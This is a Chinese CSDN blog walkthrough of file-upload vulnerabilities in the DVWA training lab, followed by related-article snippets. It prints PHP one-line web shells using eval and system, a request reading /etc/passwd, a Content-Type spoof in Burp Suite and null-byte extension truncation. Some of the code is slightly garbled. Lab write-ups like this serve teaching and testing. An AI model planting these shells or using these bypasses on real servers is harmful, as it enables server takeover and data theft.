文件上传漏洞--dvwa

最新推荐文章于 2024-04-24 10:48:01 发布
最新推荐文章于 2024-04-24 10:48:01 发布
阅读量241 收藏
点赞数
分类专栏: 安全 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/c_hristmas/article/details/104163983
版权

文件上传漏洞–dvwa

无防护:

目的主机没有对上传文件进行过滤,直接保存上传文件。上传一句话木马shell.php文件并通过浏览器访问加上参数的地址或者使用中国菜刀直接连接,获取shell。

//一句话木马
(1) shell1.php # eval 使用php函数,

phpinfo();<?php `eval($_REQUEST['seven']);?`>

访问 http://192.168.40.140/dvwa/hackable/uploads/shell1.php?cmd=phpinfo()

(2)shell2.php # system使用Linux系统命令如ls,cp,rm

<?php system($_REQUEST['seven']);?`>

访问:http://192.168.40.140/dvwa/hackable/uploads/shell1.php?seven=cat /etc/passwd

(3)中国菜刀

php eval($_POST['seven']);?>

REQUEST是通过在网页端输入变量访问代码,POST是使用中国菜刀等工具连接。

低级防护:

对文件类型(Content-Type)进行了过滤,前端代码会自动检测文件类型,符合则上传成功,不符合则上传失败。绕过方法:使用BurpSuite工具截断代理修改数据包的相关字段
如:上传文件为shell.php,可看见代码中Content-Type参数值为application/x-php,直接将application/x-php改为mage/jpeg即可绕过验证,对于文件大小的限制可以直接修改”MAX_FILE_SIZE”的的值突破文件大小限制。

一般防护:

验证上传文件的后缀名。前端验证代码如下,通过以下函数获取上传文件的后缀名,判断是否为允许上传的后缀:

$uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1)
if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) )
​绕

绕过方法:使用burpsuite进行00截断,从而使得在文件后缀验证时通过但是在文件转储的时候忽略掉00之后的内容从而实现后缀欺骗。具体步骤如下:
(1)将需要上传的shell.php文件改为shell.php 1.jpg。
(2)使用Burpsuite拦截,并将"shell.php 1.jpg"发送至decoder模块。
(3)从text模式切换到hex编辑模式,找到”shell.php 1.jpg”中空格对应的hex值“20”,将20改为00
(4)从hex模式切换到text模式并将修改过的字符串替换原来报文中的”shell.php 1.jpg”,最后转发,文件上传成功。 在版本较高的php中,此方法不适用。
文件包含漏洞@

c_hristmas
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第七天--文件上传漏洞
weixin_46653764的博客
06-04 421
文件上传章节就用upload-labs靶场 一、文件上传基础及一句话木马 1、首先了解一下 “一句话木马“ 如:<?php @eval($_POST["pass"]) ?> 是最简单的一句话木马 那它是啥意思呢? 这是一段php代码,写在<?php ?>里面才能被服务器解析; @符号是不报错,即使执行错误也不报错 $_POST是用post方法接受变量pass的值 eval()函数是把字符串当成PHP代码执行 所以,利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以.
dvwa中的文件上传漏洞
无痕的博客
01-12 7935
dvwa漏洞环境演示文件上传漏洞
文件上传与包含漏洞综合利用】DVWA-文件上传-难度:High
Mr_Fmnwon的博客
04-24 1138
一方面,(任意)文件上传漏洞指的是上传非预期的文件格式(如php文件)到目标服务器,而通过其他方式(直连、包含等)进行执行来进一步利用。另一方面,利用文件包含漏洞,能够把静态文件中的php代码通过回显转发的方式进行包含执行。过程中遇到很多问题:1.high的包含漏洞保护措施没有关注 2.一些jpeg/png图片被解析时,自身的一些字符会被错误识别为php代码,而往往会导致语法错误,通过copy到最后的。可以推测,检查是否为JPEG/PNG图,是依靠文件的后缀、文件头字段信息来进行双重检测的。
DVWA文件上传漏洞
weixin_56306210的博客
02-13 4237
DVWA文件上传
dvwa文件上传漏洞】--文件上传漏洞总结
m0_63241485的博客
08-30 3745
文件上传漏洞--dvwa
文件上传漏洞超详细解析(DVWA
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
01-09 1616
当然了,代码还有很多种写法,这只是比较简单的一种,一些特殊情况下还要使用别的写法。
web网站文件上传漏洞和攻击-运维安全详细笔记
06-30
1. 准备有文件上传漏洞的网站,例如 DVWA。 2. 客户端浏览器找到文件上传漏洞的点,上传木马文件。 3. 将木马文件上传到网站,例如 shell.php。 4. 使用中国菜刀工具,通过上传的木马文件,获取服务器的 webshell。 ...
DVWA-master.zip
07-31
在"DVWA-master.zip"这个压缩包中,主要包含的是DVWA的源代码和其他相关配置文件。解压后,你需要将整个"DVWA"目录移动到你的Web服务器的根目录,例如"www"或"htdocs"下。这样做是为了确保Web服务器能够正确地访问和...
DVWA-master.rar
03-15
安装PHPStudy后,将DVWA-master目录中的所有文件上传至PHPStudy的Web根目录。 3. **数据库配置**: 在DVWA源代码中,找到`config.inc.php`文件,配置你的MySQL数据库连接信息,包括数据库名、用户名、密码和主机地址...
dvwa——任意文件上传漏洞
GZY0601的博客
09-18 259
ok,前面把sql注入两个关卡最基本的通关方法给学了,这个文章我们来学任意文件上传漏洞,废话不多说,现在就开始!文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。其实今天应该先写的文件包含漏洞的,然后来讲文件上传的high会好点的,但是忘记了先写了,写到high才想起来,有点裂开,我们明天就来写文件包含漏洞吧。哈哈哈哈哈哈哈!好啦,以上内容为我个人理解,不喜勿喷,如有写错欢迎指出!
DVWA靶场-文件上传漏洞
zeroone的博客
03-08 1万+
第五关:File upload(文件上传)       文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限,因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。 Low <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to
DVWA靶场——File Inclusion(文件包含漏洞)
qq_74806534的博客
01-18 6440
程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。File Inclusion,文件包含(漏洞),是指当服务器开启allow_url_include选项时,就可以通过php的某些特性函数(include(),require()和include_once(),require_once())利用url去动态包含文件,此时如果没有对文件来源进行严格审查,就会导致任意文件读取或者任意命令执行。
DVWA文件上传漏洞
m0_61851859的博客
02-05 349
(1)通过$_FILES预定义变量获取上传文件的文件名(name)、文件类型(type)和文件大小(size)这是三个数据分别赋给三个变量$uploaded_name、$uploaded_type、$uploaded_size。(3)因此,medium级别主要是判断文件的类别和大小,代码中对于文件大小的限制一般文件都可以满足要求,因此主要分析文件上传的类型。(8)综上,low级别对上传的文件类型没有任何防范,其初衷是想要用户只能上传图片,而现在可以上传php文件,而且能够被网站解析。
【无标题】Dvwa靶场文件上传漏洞学习
m0_62636343的博客
09-03 689
Dvwa靶场文件上传漏洞学习笔记
文件上传的几种方式
蜗牛
07-08 1万+
SpringMVC+Jcrop截图插件+ajaxFileUpload项目搭建 Maven包导入 <!-- J2EE 包 --> <dependency> <groupId>javax</groupId> <artifactId>javaee-api</artifactId> <version>7.
文件上传漏洞(一句话木马)-学习笔记
热门推荐
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
基于DVWA文件上传,包含漏洞,上传一句话木马基础分析
Alexz__的博客
10-06 4704
木马 <?php @eval($_POST[value]); ?> 这是这个php程序,这个名字源于古希腊的传说这里就不说了,等于是一个别人家服务器在管理者不知情的情况下给你开了个后门你就可以在这里认真学习(放飞自我) 首先看eval函数: 在w3c里面找到的解释如下:eval() 函数把字符串按照 PHP 代码来计算。该字符串必须是合法的 PHP 代码,且必须以分号结尾...
dvwa文件上传漏洞
最新发布
05-11
文件上传漏洞是指攻击者通过绕过网站的文件上传功能,将自己恶意构造的文件上传到服务器上,然后利用该文件达到控制服务器的目的。一旦攻击者上传了恶意文件,他就可以在服务器上执行任意代码,并获得服务器的权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值